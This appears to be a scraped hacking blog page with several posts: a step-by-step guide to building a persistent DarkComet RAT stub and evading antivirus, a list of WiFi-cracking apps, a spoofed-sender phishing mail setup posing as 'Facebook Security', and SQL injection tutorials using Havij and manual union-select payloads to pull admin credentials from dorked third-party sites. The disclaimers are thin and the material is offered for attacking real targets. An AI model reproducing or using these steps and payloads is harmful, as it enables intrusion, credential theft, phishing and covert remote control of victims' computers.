1

How to setup DarkComet RAT for Easy Access to a Target Computer

How to setup DarkComet RAT for Easy Access to a Target Computer
Stap 01 :- Download the Dark Comet RAT from here
Step 02 :- Open the DarkComet RAR (You need WinRAR) It should look like this:
Step 03 :- Make a folder on your desktop. Name it anything you want.
Step 04 :- Drag the items from the WinRAR folder to the Tutorial folder at your Desktop. Now, everything should be there like this:
Step 05 :- Open DarkComet.exe (Run as Administrator)
Step 06 :- A TOS should show up.
Tick the box saying ‘Do not display again the EULA‘ that is located at the bottom left. And then click ‘I accept‘
Step 07 :- At the bottom left, it will show up a Help Screen, tick ‘Do not show at startup‘ then click ‘Fine‘
Step 08 :- Click DarkComet-RAT at the top left.
Step 09 :- Click ‘Listen to new port (+Listen)
A new window should open, put in your Port then tick ‘Try to forward automaticaly (UPNP)
IN this case, I will do port 70 so I put that in, tick ‘Try to forward automatically (UpNP) and click Listen.
Step 10 :- Move over to ‘Socket / Net‘ located at the very end of the top left border
You should see something like this:
70 may not be your port, your port that you added in ‘Listen to new port‘ will be displayed, not specifically 70.
Step 11 :- Now, click DarkComet-RAT again and click Server Module, then click Full Editor (Expert)
Step 12 :- Name your Security Password anything you like, then click the Mutex a few times. We then have the Main Settings done.
Step 13 :- Go to Network Settings.
Now, go to no-ip.com and register Click Free DNS
Step 14 :- Put in whatever you want for it. Make sure the email is valid because we will need it to validate. (if you don’t want to give your email, get a temp email at 10minutemail.com)
Sign in Now
Step 15 :- Now, at the Body you will see a list of options, click ‘Add Host’
Step 16 :- Copy the settings
Leave IP Address, as that will show as Default your IP address.
Step 17 :- Click Create Host.
Step 18 :- Go back to your DarkComet and put in the Ip/DNS and Port (DNS for the NO-IP you made a second ago and Port for the one you listened on!)
Step 19 :- Then click ‘Add‘ and go to Module Startup.
Tick the ‘Start the stub with windows (module startup)’
Then leave everything but ‘Persistance installation ( always come back )‘
Tick that.
Now, it should look like this:
Step 20 :- Now go to ‘Stub Finalization‘ at the end.
If you are going to get it crypted then don’t tick UPX (Ultimate Packer Executable) but if you are, I would leave it off and just have it on No compression.
Step 21 :- Now tick the ‘Save the profile when stub succesfully generated’ and Build the Stub. Now there is one last thing.
Step 22 :- Go to the Client Settings in DarkComet-RAT and then Click NO-IP Updater

Step 23 :- Then put in the NO-IP host, Username and Password, then tick ‘Auto update your no-ip dns when your IP change
Step 24 :- Now, run the stub that you generated in a Sandbox to test, and you should show up!


Here now, we have run through the entire thorough setup for DarkComet. Even your kid brother could follow this tutorial. Now what you need to do is some research into how to encrypt the EXE, so it can be installed remotely without an antivirus putting up a fuss. I know Metasploit has some pretty good encryption in it’s framework. I would start there. Watch out for others telling you they will encrypt it for you. This is usually a trick to just pack their own RAT into your stuff!

Read More

Four Best WiFi Cracking Applications For your Iphone

Four Best WiFi Cracking Applications For your Iphone
1. Aircrack-ng for IPhone:
It is the simple command line with graphical interface software which is used to crack wifi networks . It sends packets to the wifi network and then cracks the password file of the network .It is used widely and can be downloaded from here.

2. IWep Lite:
It is an Iphone applications which let you crack wifi network in less than 30 minutes . It is easy in use and can be understood easily rather than Aircrack-ng . It is Graphical interface with best utility and dictionary . Apart from Aircrac-ng it uses dictionary and so it is less trustworthy than Aircrack and can not crack every key. It is used more widely than Aircrack but it uses dictionary that's why it is on 2nd number. It can be downloaded from here .

3. WepGen:
WepGen is just another application which cracks the Wifi network by sending packets and it is rather easy in use than Aircrack but though it is on 3rd number due to it's popularity. It can be downloaded from here.

4. IWifi Hack:
It works on the same scene as other cracking softwares except iweplite means it sends packets and break in the security of a wifi network . It is easy in use and can easily be used by anyone. It can be download from here.


Read More

DarkComet RAT Full version

DarkComet RAT Full version
DarkComet RAT is a free and popular Remote Administration Tool. This software is an efficient type of software, especially created to remote control any Microsoft Windows machine. It is famous for being one of if not the most stable and most complete RAT's available. Just like VNC and other similar types of software, DarkComet gives you the ability to connect to and control your systems, wherever you are. You can keep a close eye on your computers to supervise the online activity of your employees or children. Furthermore DatkComer RAT can be used to monitor your system, remotely assist your clients or family members to recover lost data or repair a computer.
Read More

Hacking ebooks all in one free download

Hacking ebooks all in one free download

Hacking e-books 34in 1


BlueTooth Hacking
Ethical Hacking
Google Hacks
Hack & Crack
Hack Attacks Revealed
Hack Attacks Testing – How To Conduct Your Own Security Audit
Hack IT Security Through Penetration Testing
Hack Proofing Your Network – Internet Tradecraft
Hack Proofing Your Network Second Edition
Hack Proofing Your Web Server
Hack The Net
Hack Xbox 360

Hackers Black Book
Hacking Firewalls And Networks How To Hack Into Remote Computers
Hacking a Coke Machine
Hacking and Network Defense
Hacking for Dummies
Hacking Intranet Websites
Hacking Techniques
Hacking The Cable Modem
Hacking The Linux
Hacking Web Applications
Hacking Windows XP
Hacking PSP
Kevin Mitnick – The Art of Deception
Kevin Mitnick – The Art of Intrusion
Network Security Hacks – Tips & Tools For Protecting Your Privacy
PayPal Hacks
PC Hacks
Simple Hacks – Addons, Macros And More
The Database Hacker Handbook Defending Database Servers
Wireless Hacking
Wireless Network Hacks & Mods for Dummies

Download Here

Read More

Best E-Books on Hacking- FREE Download

Best E-Books on Hacking- FREE Download
I am sharing here some of the best E-Books on different topics like hacking, virus and malware, cryptography, forensics, cyber security etc, that I have found on the Web. Some of these E-Books are available on internet for free. But I thought I would put them together here. I am sharing them here for ABSOLUTELY FREE, just download them from the MediaFire.

1. GREY HAT PYTHON- PYTHON PROGRAMMING FOR HACKERS AND REVERSE ENGINEERS

I have heard python is a good language for beginners in programming and also for hackers to make scripts. So here is a nice book on python for hackers and rev engineers. 


2. Metasploit- The Penetration TesterÅ› Guide


3. BackTrack 5 Wireless Penetration Testing


4. Web Applications Hackers Handbook 2nd Edition


5. Unauthorized Access- Physical Penetration Testing for IT Security Teams


6. ShellcoderÅ› Handbook


7. Greyhat Hacking- The Ethical HackerÅ› Handbook


8. Blackbook of Computer Viruses (Electronic Edition)


9. Botnets- The Killer Web Applications


10. Hacking Exposed- Web Applications

I hope you will Learn something from it :) Stay tuned for more :)
Read More

How to send Anonymous Mail to anyone

How to send Anonymous Mail to anyone
Disclaimer:-  The below tutorial is completely for Educational purpose only, Do not use it illegal activities. I'll be not responsible for any Illegal activity performed by any reader.

Everyone Like to send Anonymous Mail to your enemy or friend or teacher.  Here is the Hacking tutorial for you to implement that.  So i hope This will be best hack for you.

For Eg:
You can say we are from Facbook, we have new feature to enable the feature visit this page.

How to do? 

Step 1:- First of all you need to register in free web hosting service which has PHP feature.  So my choice is
000webhost

Step 2:- Now Download and extract this File. Inside the file you can find the mail.php file.

Step 3:- Now Go to 000webhost.com and login with your username and password. Upload the "mail.php" file to "public_html" folder.

Step 4:- That's all you finished. Now go to this page yourhosturl/mail.php Change the yourhosturl with your website url which you gave it when you register in 000webhost.com

For eg:- yourfavorites.comli.com/mail.php Usually the default will be "name.comli.com"

When you visit you will see the form just like this:
Fill the form with your victim mail address and message subject and send.
     Don't give your details in the sender field. Just fill with any organization name.
For Eg:- Facebook Security

         If you have any doubts or want to say thanks,please comment me
Read More

Hack Websites Using Havij [SQL Injection Tutorial]

Hack Websites Using Havij [SQL Injection Tutorial]
Disclaimer:-  The Below tutorial is completely for Educational purpose only, Do not use it to hack any third party website. I'll be not responsible for any SQL Injection attack performed by any reader.

Havij:-
One of the popular tools is Havij, Havij is an advanced SQL injection tool which makes SQL Injection very easy for you, Along with SQL injection it has a built in admin page finder which makes it very effective. If you don't have the Havij then Download it from our Tools Room

Supported Databases With Havij:-
  • MsSQL 2000/2005 with error.
  • MsSQL 2000/2005 no error union based
  • MySQL union based
  • MySQL Blind
  • MySQL error based
  • MySQL time based
  • Oracle union based
  • MsAccess union based
  • Sybase (ASE)
Tutorial:-
Now I will Show you step by step the process of SQL injection.
Read Also:- How To Find the SQL Vulnerability Site
Find SQL injection Vulnerability in your site and insert the string (like http://www.target.com/index.asp?id=123) of it in Havij as show below.
Now click on the Analyse button as shown below.
Now if the your Server is Vulnerable the information about the target will appear and the columns will appear like shown in picture below:
Now click on the Tables button and then click Get Tables button from below column as shown below:
Now select the Tables with sensitive information and click Get Columns button.After that select the Username and Password Column to get the Username and Password and click on the Get Table button.
After Getting Columns and all.. Finally Click on 'Get Data' and you will get all login ID and Mdp_user as Shown in the Image :-
Now, it's time to Enter into Website using this Two Admin login ID and Password. To get the Admin page Click on 'Find Admin' and click on start to Analyze the admin page :-
Got up :D, Now go to that URL of admin and Login with ID and password you got from Database :D We Hacked into website that's it Done. You  got Admin Seat and Enjoy,Play  with Website :D
Read More

How to hack Website using SQL Injection with easy Steps.

How to hack Website using SQL Injection with easy Steps.
 Disclaimer:-  The Below tutorial is completely for Educational purpose only, Do not use it to hack any third party website. I'll be not responsible for any SQL Injection attack performed by any reader.

After a long time it's my first tutorial on website hacking using SQL Injection attack with easy and simple steps. I have seen many people's they can't understand SQL Injection method because it's really very hard to understand and Inject Malicious code into URL and get website Database, So here I created SQL Injection tutorial with easy steps and understandable, Hope you all will like it.

✔ What is SQL Injection ? 
      SQL Injection is one the common Web application vulneraility that allows an attacker to inject malicious SQL command through Parameter or any Input box that is connected to Website Database. In SQL Injection an attacker finds  (SQLi) vulnerablility and Inject Malicious code through various techniques and Hack the website Database this is called SQL Injection attack Exploiting DB (Database) and also SQL Injection Vulnerability Exploitation. Using SQL Injection attack method an attacker can get complete DB of website - User ID and Password can be exploded, an attacker can also Shut down My SQL Server. An attacker can modify content of website & bypass login.

✔ Requirements :-

  • SQL Injection Dorks. List - 01 List - 02 List - 03
  • Vulnerable Website. (Use Google to find Vulnerable Website)
  • Firefox with Hack bar add-on.
  • Little bit understanding of SQL Injection and URL
  • Fresh Mind to Understand it.
1. Find Vulnerable website.
      An attacker always use Google, Bing or Yahoo search engine for searching SQL Injection Vulnerable websites using Dorks. Dorks with Parameter URL.

  • Click here to download Huge list of SQL Injection Dorks
  • Search any one dork on Google, For Eg. m using inurl:index.php?id=
  • Basically I always use Google to search Vulnerable websites. and if you want to Hack particular website, then you have to scan it or manually check every page, URL to identify whether it is vulnerable or not.

Here, for tutorial I already have one Vulnerable website (But I can't expose it's name) In this result you will find thousands of websites. the common thing in this search result is all website URL having this type of code at it's end inurl:index.php?id= 
Yeah, Definitely it will have because this all website having SQL Parameter into their URL. So simply Google searched it.

For Eg. www.targetwebsite.com/index.php?id=8

✔ Find SQLi Vulnerabilities

  • Open any website URL which have SQL Parameter. like Dorks
  • Put Single Quote at the End of the website URL (')
  • For Eg.: www.targetwebsite.com/index.php?id=2'
  • If the page remains same or Not found then it's not vulnerable and if the page shows any type of Error related to SQL String or MySQL Error then the website is vulnerable to SQLi. For Eg. I got this Error .:
An error occurred...You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/contentPage.php?id=8''' at line 1
  • This means the website is vulnerable to SQL Injection. *Cheers*
✔ Find the number of Columns.
  • Yehfii !! We found SQL Injection Vulnerable website now it's time to find no. of Columns present in the Database.
  • To do that replace that one single quote ( ' ) with "Order By no." Statement until you find the Error message. Change the no. from 1,2,3,4,5,6,7,8,9,..... Until you get an Error Message like "Unknown Column"
  • For Example :- Change it's Order By 1,2,3,4 like below Example :-
www.targetwebsite.com/index.php?id=8 Order by 1
www.targetwebsite.com/index.php?id=8 Order by 2
www.targetwebsite.com/index.php?id=8 Order by 3

  • And Suppose above Method doesn't work then use below method.
www.targetwebsite.com/index.php?id=8 order by 1--
www.targetwebsite.com/index.php?id=8 order by 2--
www.targetwebsite.com/index.php?id=8 order by 3--

If you get an Error on Order by 9 that means the DB have 8 number of Columns and If u had found error on Order by 6 then the DB have 5 number of Columns. I mean if you put Order by 12 and Suppose the DB have only 11 no. of Columns then Website will show Error like this.: An error occurred  Unknown column '12' in 'order clause'.

# This trick is actually used to find the number of Columns in DB. Understand the Below example and you wil get to know.

www.targetwebsite.com/index.php?id=8 Order by 1  (No Error)
www.targetwebsite.com/index.php?id=8 Order by 2  (No Error)
www.targetwebsite.com/index.php?id=8 Order by 3  (No Error)
www.targetwebsite.com/index.php?id=8 Order by 4  (No Error)
www.targetwebsite.com/index.php?id=8 Order by 5  (No Error)
www.targetwebsite.com/index.php?id=8 Order by 6    (Error)
.........................Try Until you get an Error..........................

Here, my Vulnerable website Showed Error on Order by 12 that means my Vulnerable website have 11 number of columns in it's DB. So now here I found number of columns in my DB :- Number of Columns = 11

✔ Find the Vulnerable Column.
  • Basically if the website is vulnerable then it have vulnerability in it's column and now it's time to find out that column. Well we have successfully discovered number of columns present in Database. let us find Vulnerable Column by using the Query "Union Select columns_sequence". And also change the ID Value to Negative, I mean Suppose the website have this URL index.php?id=8 Change it to index.php?id=-8. Just put minus sign "-" before ID.
  • For Eg. If the Number of Column is 11 then the query is as follow :-
www.targetwebsite.com/index.php?id=-8 union select 1,2,3,4,5,6,7,8,9,10,11--
  • And Suppose above Method won't work then use below method:-
www.targetwebsite.com/index.php?id=-8 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11--

  • And Once if the Query has been Executed then it will display the number of Column.


  • In the Above result, I found three vulnerable Columns 2,3 & 4. let take 2 as our tutorial Well ! We found Vulnerable Columns, Now Next Step.
✔ Finding version, Database and User.
  • Now this time we've to find out website Database version, User, Database Name & some other Information, Just replace Vulnerable Column no. with "version()"
For Eg. 
www.targetwebsite.com/index.php?id=-8 union select 1,version(),3,4,5,6,7,8,9,10,11--

 And now Hit Enter : and you will  get result.
Now again do the same replace Vulnerable column with different query like :- database(), user()

For Eg.
www.targetwebsite.com/index.php?id=-8 union select 1,version(),3,4,5,6,7,8,9,10,11--
www.targetwebsite.com/index.php?id=-8 union select 1,database(),3,4,5,6,7,8,9,10,11--
www.targetwebsite.com/index.php?id=-8 union select 1,user(),3,4,5,6,7,8,9,10,11--

               And Suppose above Method won't work then use below method 

www.targetwebsite.com/index.php?id=-8 and 1=2 union select 1,unhex(hex(@@version)),3,4,5,6,7,8,9,10,11--

✔ Finding the Table name.
  • Here we found vulnerable Column, DB Version name and User it's time to get Table name. If the database version is 4 or above then you gave to guess the table names (Blind SQL Injection attack)
  • Let us find now Table name of the Database, Same here Replace Vulnerable Column number with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"
For Eg. 
www.targetwebsite.com/index.php?id=-8 union select
 1,group_concat(table_name),3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--

Now hit Enter and you can see Complete Table of Database.
Great we found Table name now find the table name that is related to admin or user. as you can see in the above image there is one table name :-  userDatabase. Let us choose that table userdatabase and Go on Next step.

✔ Finding the Column name.
  • Now same to find Column names, replace "group_concat(table_name) with "group_concat(column_name)" and Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--
  • Do not hit Enter now,First of all Convert  table name into Mysql Char String()
  • After Installing you can see the toolbar, and if you can't then Hit F9.Select sql->Mysql->MysqlChar() in the Hackbar.
  • Enter the Table name you want to convert it into Mysql Char 
  • Now you can see the Char like this :-
  • Copy and paste the code at the end of the url instead of the "mysqlchar"
For Eg.
www.targetwebsite.com/index.php?id=-8 union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11 FROM information_schema.columns WHERE table_name=CHAR(117, 115, 101, 114, 68, 97, 116, 97, 98, 97, 115, 101)--
  • And Now Hit Enter and you will be able to see the Column names like this
✔ Explore Database & Hack it.
                     Cool! now you know the next step what to do :D..... get the ID and Password of Admin user using this Command into URL.Now replace  group_concat(column_name) with group_concat(username,0x2a,password). or any other Column name you want to get Data.

For Eg.
http://targetwebsite.com/index.php?id=-8 and 1=2 union select 1,group_concat(username,0x2a,password),3,4,5,6,7,8,9,10,11 from userDatabase--
  • If the above Command doesn't work then use Column name from first and put all Columns at one time and you will able to get complete database.
  • Then find the admin page 
Read More